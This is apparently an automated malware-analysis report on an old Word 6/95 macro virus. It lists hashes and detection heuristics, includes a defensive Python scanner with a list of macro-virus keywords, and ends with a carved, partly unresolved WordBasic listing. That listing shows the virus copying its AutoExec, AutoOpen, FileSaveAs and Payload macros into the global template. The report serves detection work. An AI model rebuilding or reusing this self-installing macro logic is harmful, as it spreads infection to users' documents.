Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 8cc3b21c983ddb1a…

MALICIOUS

Office (OLE)

Size: 7.5 KB
First seen: 2012-06-14
MD5: 98c9fdad8502113d5adbaa8a398c5142
SHA-1: 238d3728fd6119dc5597e93bec870faf888bc9e5
SHA-256: 8cc3b21c983ddb1a3acaebd3947ad1d20040946507979f16c0f052f2ade54695
Risk Score: 102

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The sample carries legacy WordBasic macro-virus markers, specifically the string 'RSN MACRO VIRUS', together with numerous embedded macro names (AutoExec, AutoOpen, FileSaveAs, InsertPayload, Payload) and code fragments. The marker string, the auto-execution macro names and the copies of those macros to 'Global:' targets (the global template) all point to a self-installing Word 6/95 macro virus, the technique characteristic of older macro-based malware families. The ClamAV detection as 'Win.Trojan.Nuclear-7' further supports the malicious classification.

Heuristics (3)

  • ClamAV: Win.Trojan.Nuclear-7 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Trojan.Nuclear-7
  • Legacy WordBasic macro-virus markers [high] OLE_LEGACY_WORDBASIC_MACRO_VIRUS
    The OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro, or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
  • Recovered legacy WordBasic macro source [info] OLE_LEGACY_WORDBASIC_MACRO_SOURCE
    The Word 6.0/95 document stores tokenised WordBasic macros in the WordDocument stream rather than as a modern VBA project, so VBA source extraction cannot see them. The macro source was detokenised and carved so that its identifiers, string literals (file paths, URLs, registry keys, message text) and comments are available for review and signature scanning.
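The following is an added example, not the analyzer's own code, approximating the OLE_LEGACY_WORDBASIC_MACRO_VIRUS rule above: it scans the WordDocument stream (or, without the optional olefile package, the whole file) for the auto-execution macro names, the macro-manipulation statements and the named virus marker, and treats an auto macro alone as not suspicious, since legitimate templates use AutoOpen too. The extra names AutoClose/AutoNew/AutoExit and MacroCopy, the UTF-16LE fallback and the sample byte strings are assumptions and constructed inputs, not data from the sample.

```python
"""Heuristic scan for legacy WordBasic macro-virus markers in a Word 6/95 OLE
document.  Added example approximating the OLE_LEGACY_WORDBASIC_MACRO_VIRUS
rule described in the report; this is not the analyzer's code."""
import re
from dataclasses import dataclass, field

# Auto-execution macro names.  AutoExec/AutoOpen occur in the sample; the
# other three are the remaining WordBasic auto macros (assumption that the
# analyzer's own list is similar).
AUTO_MACROS = ("AutoExec", "AutoOpen", "AutoClose", "AutoNew", "AutoExit")
# Macro-manipulation names from the heuristic text, plus MacroCopy, the
# WordBasic statement that copies a macro between templates (assumption).
MACRO_TOOLS = ("ToolsMacro", "MacroFile", "fileMacro", "globMacro", "MacroCopy")
# Named historical macro-virus strings; the sample carries this one.
VIRUS_MARKERS = ("RSN MACRO VIRUS",)


def _find(data: bytes, names) -> list:
    """Case-insensitive substring search.  Tokenised macro text in Word 6/95
    is 8-bit; the UTF-16LE form is tried as well as a precaution (assumption)."""
    hits = []
    for name in names:
        patterns = (re.escape(name.encode("latin-1")),
                    re.escape(name.encode("utf-16-le")))
        if any(re.search(p, data, re.IGNORECASE) for p in patterns):
            hits.append(name)
    return hits


@dataclass
class ScanResult:
    auto_macros: list = field(default_factory=list)
    macro_tools: list = field(default_factory=list)
    virus_markers: list = field(default_factory=list)
    global_targets: list = field(default_factory=list)  # "Global:<Name>" strings

    @property
    def suspicious(self) -> bool:
        # Rule from the heuristic text: an auto macro together with a
        # macro-manipulation statement, or a named virus marker.  An auto
        # macro on its own is not enough; legitimate templates use AutoOpen.
        return bool(self.virus_markers) or (
            bool(self.auto_macros) and bool(self.macro_tools))


def scan_wordbasic(data: bytes) -> ScanResult:
    """Scan raw stream bytes and return the matched indicators."""
    result = ScanResult(
        auto_macros=_find(data, AUTO_MACROS),
        macro_tools=_find(data, MACRO_TOOLS),
        virus_markers=_find(data, VIRUS_MARKERS),
    )
    # Copy targets of the form Global:<Name>, as in the carved listing, mean the
    # macro is installed into the global template, which is how it persists.
    result.global_targets = sorted(
        {m.decode("latin-1") for m in re.findall(rb"Global:[A-Za-z]+", data)})
    return result


def read_word_stream(path: str) -> bytes:
    """Return the WordDocument stream (where Word 6/95 keeps tokenised macros)
    when the optional olefile package is available, else the whole file."""
    with open(path, "rb") as fh:
        raw = fh.read()
    try:
        import olefile  # third-party, optional (assumption)
    except ImportError:
        return raw
    if olefile.isOleFile(raw):
        ole = olefile.OleFileIO(raw)
        try:
            if ole.exists("WordDocument"):
                return ole.openstream("WordDocument").read()
        finally:
            ole.close()
    return raw


# Constructed sample streams (not real malware): filler bytes around the
# identifiers seen in the carved listing.
INFECTED = (b"\x00" * 16 + b"MAIN\x00AutoExec\x00Global:AutoExec\x00"
            b"Global:InsertPayload\x00RSN MACRO VIRUS\x00MacroCopy\x00")
# A template with an AutoOpen macro but nothing that installs macros.
CLEAN_TEMPLATE = b"\x00" * 8 + b"AutoOpen\x00MsgBox \"Hello\"\x00"
# No named marker, but AutoOpen plus ToolsMacro trips the second leg.
STAGER = b"\x00" * 4 + b"AutoOpen\x00ToolsMacro .Name = \"Stage2\"\x00"


if __name__ == "__main__":
    import sys
    data = read_word_stream(sys.argv[1]) if len(sys.argv) > 1 else INFECTED
    r = scan_wordbasic(data)
    print("suspicious:", r.suspicious)
    print("auto macros:", r.auto_macros, "tools:", r.macro_tools)
    print("markers:", r.virus_markers, "global targets:", r.global_targets)
```

Run it as `python scan_wordbasic.py sample.doc`; with no argument it scans the constructed INFECTED blob. Scanning the WordDocument stream rather than a VBA project is the point: oletools-style VBA extraction reads the `Macros`/`VBA` storage and never sees these Word 6/95 macros.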

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: wordbasic_macros.txt
Kind: wordbasic-macro
Source: analyzer.wordbasic (detokenised Word 6/95 WordBasic macro source)
Size: 1625 bytes
SHA-256: aab2017839db6b91be3a18eafe0cd4837cd94e9d35dcf8033be25b277ac39168

Preview: first 1,000 lines of the extracted script (the carved file is shorter than that, so it is shown in full). Opcodes the detokeniser did not resolve to a WordBasic statement name appear as @cmdXXXX placeholders.
, = , 21349          
        357 24943
= 24943
=
MAIN
REM 	StartDir$ = "C:\"
REM 	ChDir StartDir$
REM 	ScanDir StartDir$
ScanDir Path$
@cmd80ac Path$
DirCount = @cmd80e8
n = 1 DirCount
DirName$ = @cmd80e9 n
temp$ = @cmd80a1 "*.*"
temp$
@cmd8103 temp$ , 0
@cmd80ab temp$
temp$ = @cmd80a1
ScanDir DirName$ n
@cmd80a1 "." Path$
@cmd80ac ".."
MAIN
CheckInstalled = 0
@cmd80c2 @cmd803b = ":AutoExec" , "Global:AutoExec" , 1
@cmd80c2 @cmd803b = ":AutoOpen" , "Global:AutoOpen" , 1
@cmd80c2 @cmd803b = ":FileSaveAs" , "Global:FileSaveAs" , 1
@cmd80c2 @cmd803b = ":InsertPayload" , "Global:InsertPayload" , 1
@cmd80c2 @cmd803b = ":PayLoad" , "Global:Payload" , 1
Payload
CheckInstalled
CheckInstalled = 0
@cmd80b7 0 0
i = 1 @cmd80b7 0
= @cmd80b8 i , 0 = "AutoExec"
CheckInstalled = 1
=
i
MAIN
CheckInstalled = 0
@cmd80c2 @cmd803b = ":AutoExec" , "Global:AutoExec" , 1
@cmd80c2 @cmd803b = ":AutoOpen" , "Global:AutoOpen" , 1
@cmd80c2 @cmd803b = ":FileSaveAs" , "Global:FileSaveAs" , 1
@cmd80c2 @cmd803b = ":InsertPayload" , "Global:InsertPayload" , 1
@cmd80c2 @cmd803b = ":PayLoad" , "Global:Payload" , 1
Payload
CheckInstalled
REM Check if AutoExec macro already exists.
CheckInstalled = 0
@cmd80b7 0 0
i = 1 @cmd80b7 0
= @cmd80b8 i , 0 = "AutoExec"
CheckInstalled = 1
=
i
MAIN
dlg @cmd0054
dlg
dlg
dlg = 0 dlg = 1
@cmd80c2 "Global:AutoExec" , @cmd803b = ":AutoExec" , 1
@cmd80c2 "Global:AutoOpen" , @cmd803b = ":AutoOpen" , 1
@cmd80c2 "Global:FileSaveAs" , @cmd803b = ":FileSaveAs" , 1
@cmd80c2 "Global:InsertPayload" , @cmd803b = ":InsertPayload" , 1
@cmd80c2 "Global:Payload" , @cmd803b = ":Payload" , 1
dlg = 1
@cmd0054 dlg
MAIN